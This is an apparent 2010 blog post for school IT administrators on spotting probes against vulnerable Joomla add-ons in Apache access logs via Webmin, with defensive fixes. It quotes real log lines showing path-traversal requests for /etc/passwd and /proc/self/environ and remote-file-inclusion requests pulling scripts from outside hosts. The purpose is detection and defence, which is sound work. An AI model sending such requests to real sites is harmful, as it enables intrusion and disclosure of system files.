SOSTX

Often when discussing/cussing security of operating systems, Windows folks point out that the most popular will draw attention of those that would do harm because there's more 'bang for the buck'.  That's true of open source apps too.  And, since many ISD's have firewalls, port 80 is one of the few open ports to the inner ISD network.  Thus, Joomla's and port 80 anything is a potential target.  Now that school is out … maybe little johnny hacker will be more inclined to try out some stuff, too!

Got Joomla with some add-ons installed?  When's the last time you checked on the versions of those add-ons?
When's the last time you paid attention to logwatch reports (the web server section) and investigated?
Might be time you did!  There are active scans/probes looking for weak/vulnerable add-ons to Joomla's and IF your Joomla is not up to the latest version 1.5.18 and IF those add-ons have issues, your site is in danger of getting root kitted.

The following is for Linux boxen with Webmin installed.

How to check activity:
Login to your webmin.
Go to System -> System Logs
Click the "view" link for the /var/log/httpd/access_log line.
The view will show the last 20 lines of that log.
To see what/who is probing your server, change the "Last" number 20 to 200000.
and in the "Only show lines with text" type: ../../../
Then click "Refresh".

First … DON'T PANIC!  You might be seeing just a probe and your server is NOT in danger at all.
BUT, some investigation is in order for if they point to a vulnerable add-on, you might have a problem.

What you'll see is something like below:

137.118.32.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"

Explanation:
Note that in the example above, it shows 404 responses by the server.  404 is not found.  But, given the example, that could be that the server from which this clip was taken isn't running joomla add-on com_fabrick.  Also note that it was probing for /proc/self/environ which is just information … but information they shouldn't be seeing anyway so there is reason for concern.

Any activity such as above is bad, but here's an example of ones that should raise your eyebrows!

174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_docman=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"

Explanation:
Again note: 404's but notice what they are seeking … /etc/passwrd.
Now we're getting more serious, huh?

Lines like this one could indicate a problem:

121.190.102.21 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"

or this one:

65.60.53.122 - - [31/May/2010:11:18:55 -0500] "GET /////////?cmd&file=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 29958 "-" "Mozilla/5.0"

NOTE: 200 code … in this case, that's not good.
bellschool.net is another Joomla located overseas.

Solutions:

1. make sure, if you see any com_ that is installed, it is the latest version.
IF not the latest version and you can't find an update to it, consider removing the component/add-on.

2. you could start either:
a. using .htaccess deny/allow to block IP ranges or maybe entire countries from accessing your web server.
b. check into using mod-rewrite and rules for libwww-perl to deny or report gone responses to request that ID the browser agent as libwww-perl.

See:
Time for some Joomla Spring Cleaning?
SOSSIG
http://sos.tcea.org/index.php?option=com_content&view=article&id=540:time-for-some-joomla-spring-cleaning&catid=96:joomla-tips&Itemid=338
or SOSTX
http://www.sosoftexas.org/joomla15/index.php?option=com_content&view=article&id=466:time-for-some-joomla-spring-cleaning&catid=71:joomla-tips&Itemid=201

for more info and links.